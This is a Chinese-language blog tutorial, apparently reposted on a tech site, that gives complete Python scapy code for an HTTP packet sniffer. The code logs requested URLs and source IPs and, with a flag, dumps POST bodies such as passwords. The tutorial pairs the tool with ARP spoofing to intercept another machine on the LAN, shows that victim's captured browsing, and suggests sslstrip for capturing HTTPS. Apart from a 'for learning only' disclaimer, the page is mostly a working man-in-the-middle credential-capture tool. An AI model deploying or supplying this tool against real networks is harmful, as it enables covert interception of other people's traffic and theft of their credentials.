用python嗅探网络中所有HTTP数据包
csdh11 2025-04-28 23:59 2 浏览
对网络安全工程师来说,监视网络似乎总是一项有用的任务,因为它使他们能够查看网络中正在发生的事情,查看和控制恶意流量等。在本教程中,您将学会如何嗅探HTTP数据包。
我们继续使用scapy来实现嗅探,一旦检测到HTTP请求,我们将提取一些信息并打印出来,很容易吗?让我们开始吧。
在Scapy 2.4.3+中,默认情况下支持HTTP数据包。让我们安装本教程的要求:
pip3 install scapy colorama
我们这里需要colorama只是为了输出http数据包的时候好看一些。
让我们导入必要的模块:
from scapy.all import *
from scapy.layers.http import HTTPRequest # import HTTP packet
from colorama import init, Fore
# initialize colorama
init()
# define colors
GREEN = Fore.GREEN
RED = Fore.RED
RESET = Fore.RESET
让我们定义处理嗅探的函数:
def sniff_packets(iface=None):
"""
Sniff 80 port packets with `iface`, if None (default), then the
Scapy's default interface is used
"""
if iface:
# port 80 for http (generally)
# `process_packet` is the callback
sniff(filter="port 80", prn=process_packet, iface=iface, store=False)
else:
# sniff with default interface
sniff(filter="port 80", prn=process_packet, store=False)
您可能会注意到,我们在此处指定了端口80,这是因为HTTP的标准端口是80,所以我们已经在过滤掉不需要的数据包。
我们将process_packet()函数传递给sniff()函数,作为监听数据包时调用的回调,它将数据包作为参数,让我们实现它:
def process_packet(packet):
"""
This function is executed whenever a packet is sniffed
"""
if packet.haslayer(HTTPRequest):
# if this packet is an HTTP Request
# get the requested URL
url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()
# get the requester's IP Address
ip = packet[IP].src
# get the request method
method = packet[HTTPRequest].Method.decode()
print(f"\n{GREEN}[+] {ip} Requested {url} with {method}{RESET}")
if show_raw and packet.haslayer(Raw) and method == "POST":
# if show_raw flag is enabled, has raw data, and the requested method is "POST"
# then show raw
print(f"\n{RED}[*] Some useful Raw data: {packet[Raw].load}{RESET}")
我们在此处嗅探请求的URL,请求者的IP和请求方法,但不仅限于此,尝试使用packet.show()方法打印整个HTTP请求数据包,您将看到大量信息,您可以自定义输出。
不必担心show_raw变量,它只是一个全局标志,它指示我们是否打印POST原始数据,例如密码,搜索查询等。我们将在脚本的参数中传递它。
现在让我们实现主要代码:
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="HTTP Packet Sniffer, this is useful when you're a man in the middle." \
+ "It is suggested that you run arp spoof before you use this script, otherwise it'll sniff your personal packets")
parser.add_argument("-i", "--iface", help="Interface to use, default is scapy's default interface")
parser.add_argument("--show-raw", dest="show_raw", action="store_true", help="Whether to print POST raw data, such as passwords, search queries, etc.")
# parse arguments
args = parser.parse_args()
iface = args.iface
show_raw = args.show_raw
sniff_packets(iface)
我们已经使用argparse 模块从命令行或终端解析参数,现在让我们运行脚本(我将其命名为http_filter.py):
root@bfw:~/pythonscripts# python3 http_sniffer.py -i wlan0 --show-raw
这是在我的本地计算机上浏览HTTP网站bfw.wiki后的输出:
[+] 192.168.1.105 Requested bfw.wiki/ with GET
[+] 192.168.1.105 Requested www.bfw.wiki/ with GET
现在我们已经实现嗅探本机电脑的http数据包的功能,那么如何嗅探整个局域网的其他电脑主机发送的htpp报文呢?其实,当您是中间人时,您可以嗅探整个网络或特定主机上的数据包。您可以实施arp欺骗。
为此,您需要使用我上上节课中写的《用Python演示ARP攻击的过程及应对办法 》来实现伪装,这是使用它的方法:
这时,我们正在欺骗“ 192.168.1.100”,说我们是路由器,因此,进入或流出目标计算机的任何数据包都会先流向我们,然后流向路由器。
现在,让我们尝试再次运行http_filter.py脚本:
root@bfw:~/pythonscripts# python3 http_sniffer.py -i wlan0 --show-raw
在“ 192.168.1.100”(这是我的另外一台Windows计算机)中浏览互联网访问bfw.wiki后,我在我的攻击机中得到了以下输出:
[+] 192.168.1.100 Requested bfw.wiki/ with GET
[+] 192.168.1.100 Requested www.bfw.wiki/ with GET
[+] 192.168.1.100 Requested www.taobao.com/ with GET
[+] 192.168.1.100 Requested www.taobao.com/index/ with GET
很酷吧?请注意,您还可以使用sslstrip扩展它,使其也可以嗅探HTTPS请求!
好了,现在您可以嗅探整个网络中的http数据报文了,是不是很酷,关注我,每天更新一篇技术好文。
免责声明:本文仅供学习,禁止用于非法用途。
相关推荐
- 100个python的基本语法知识【下】
-
50.压缩文件:importzipfilewithzipfile.ZipFile("file.zip","r")aszip_ref:zip_...
- python 进阶突破——内置模块(Standard Library)
-
Python提供了丰富的内置模块(StandardLibrary),无需安装即可直接使用。以下是一些常用的内置模块及其主要功能:1.文件与系统操作...
- Python带你找回童年的万花尺
-
还记得小时候的万花尺吧?这么画:一点也不费脑筋,就可以出来这么多丰富多彩的复杂几何图形。具体而言,可以用万花尺玩具(如图2-1所示)来绘制数学曲线。这种玩具由两个不同尺寸的塑料齿轮组成,一大一小。小的...
- 用python嗅探网络中所有HTTP数据包
-
对网络安全工程师来说,监视网络似乎总是一项有用的任务,因为它使他们能够查看网络中正在发生的事情,查看和控制恶意流量等。在本教程中,您将学会如何嗅探HTTP数据包。我们继续使用scapy来实现嗅探,一旦...
- 【Python】自动化编程之系统操作 argparse 库
-
argparse简介#python#...
- Python 知识点 #34 - argparse模块
-
在Python中,我们可以使用argparse模块来解析命令行参数。argparse提供了一种简单而灵活的方式来定义和处理命令行参数,使我们可以轻松地构建命令行界面。...
- Flask-RESTful 用法指南
-
Flask-RESTful是一个Flask扩展,用于快速构建RESTfulAPI。它提供了简单的语法来创建资源路由,并内置了请求解析和响应格式化功能。##安装首先安装Flask-REST...
- 原来 PHP 函数 explode 还有第三个参数,竟然这么好用!
-
explode是PHP一个常见的字符串处理函数,主要用于将字符串按照指定的分隔符拆分成数组。比如下面的代码就是通过英文逗号将字符串转换为数组。...
- Day230:argparse模块的位置参数和可选参数
-
argparse是python标准库中提供的用来解析命令行参数的模块,非常强大!在深入学习argparse模块之前,需要先搞清楚命令行位置参数和可选参数的概念。...
- python argsparse模块实现命令行参数
-
argparse是Python标准库中的一个模块,它可以帮助我们轻松地编写命令行界面(CLI)程序。argparse模块提供了一种简单而灵活的方式来处理命令行参数,使得我们可以轻松地编写具有复杂参数的...
- Python黑客入门:暴力破解zip,零基础也可以学会
-
照顾没有接触过Python编程的同学,行文可能会有些啰嗦。当然对于那些没有接触过Python的同学小编这里准备了一份Python学习资料,希望对你们有帮助,还有一份Python黑客入门教程你都是可以私...
- Python命令行参数解析模块argparse
-
前言以前optparse比较火,但是在python2.7版本后,官方不再维护这个模块,转而大力支持argparse...
- Python argparse模块作用及应用
-
在Python中,可以使用argparse模块来解析命令行参数。argparse提供了一种简单而灵活的方式来定义和解析命令行参数。下面是一些常用的解析器参数设置及其示例:1.add_argument(...
- 每天一个 Python 库:argparse 参数解析,轻松搞定脚本配置!
-
在开发Python脚本时,命令行参数的解析是一个常见而又重要的操作。无论是处理用户输入的文件路径,还是接受参数配置,argparse都能轻松帮你搞定。如果你还不熟悉argparse,本文将带你...
- 一文彻底搞懂如何利用kaggle训练yolov5模型
-
笔者的运行环境:python3.8+pytorch2.0.1+pycharm+kaggle。...
- 一周热门
- 最近发表
- 标签列表
-
- mydisktest_v298 (34)
- document.appendchild (35)
- 头像打包下载 (61)
- acmecadconverter_8.52绿色版 (39)
- word文档批量处理大师破解版 (36)
- server2016安装密钥 (33)
- mysql 昨天的日期 (37)
- parsevideo (33)
- 个人网站源码 (37)
- centos7.4下载 (33)
- mysql 查询今天的数据 (34)
- intouch2014r2sp1永久授权 (36)
- 先锋影音源资2019 (35)
- jdk1.8.0_191下载 (33)
- axure9注册码 (33)
- pts/1 (33)
- spire.pdf 破解版 (35)
- shiro jwt (35)
- sklearn中文手册pdf (35)
- itextsharp使用手册 (33)
- 凯立德2012夏季版懒人包 (34)
- 冒险岛代码查询器 (34)
- 128*128png图片 (34)
- jdk1.8.0_131下载 (34)
- dos 删除目录下所有子目录及文件 (36)